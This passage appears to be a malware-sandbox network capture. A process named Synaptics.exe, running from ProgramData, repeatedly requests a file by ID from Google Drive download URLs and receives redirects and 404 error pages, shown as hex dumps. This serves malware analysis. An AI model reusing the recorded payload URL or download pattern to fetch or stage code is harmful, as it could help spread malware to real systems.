                                                                                                                      2024-12-30 10:41:00 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 5f 58 73 6a 4e 42 76 37 4e 50 69 55 73 57 62 69 4b 36 69 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="U_XsjNBv7NPiUsWbiK6i0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:00 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      77192.168.2.650001142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:00 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:00 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:00 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-i_o4K1TRDeWnZfE2TNFAYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      78192.168.2.650004142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:00 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:00 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:00 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-r5xzcnMwpp77inVJvF-SXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      79192.168.2.650005142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:00 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:01 UTC1242INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5yveiLSskt7iFiFxg6XgpuxgGkEIXbzJHDQQuW1srNQly4ssmh1saYmQEtE8_Xj_k
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:00 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-saZtOUn30UKr2bjhO9Qryw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:01 UTC148INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
                                                                                                                      2024-12-30 10:41:01 UTC1390INData Raw: 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 57 46 4e 71 38 77 6c 45 31 31 63 54 6b 38 69 2d 38 37 77 70 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a
                                                                                                                      Data Ascii: Found)!!1</title><style nonce="_WFNq8wlE11cTk8i-87wpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
                                                                                                                      2024-12-30 10:41:01 UTC114INData Raw: 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      80192.168.2.650012142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:01 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:01 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-b-oGGGke3eV-Uvnn_2bl1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      81192.168.2.650013142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:01 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      82192.168.2.650014142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:01 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      83192.168.2.650015142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:01 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      84192.168.2.650021142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:02 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:02 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9M3nIeXL6MFHByf4uSR2kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      85192.168.2.650022142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:02 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:02 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC74Oxl__-inG6dAcVNgbl_Kz4uLLTYSQXcbPXJtxUxNWf_ZRk75h9DXtxwQwhfKr4DQ
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:02 GMT
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Uq6h2JItZOSxoxTdiqpqVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:02 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:02 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 6b 58 56 36 36 47 70 4d 47 35 39 56 75 36 72 2d 73 35 39 7a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="YkXV66GpMG59Vu6r-s59zQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:02 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      86192.168.2.650023142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:02 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:02 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ZsVzgmCWTvN-1XJx9hVltg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
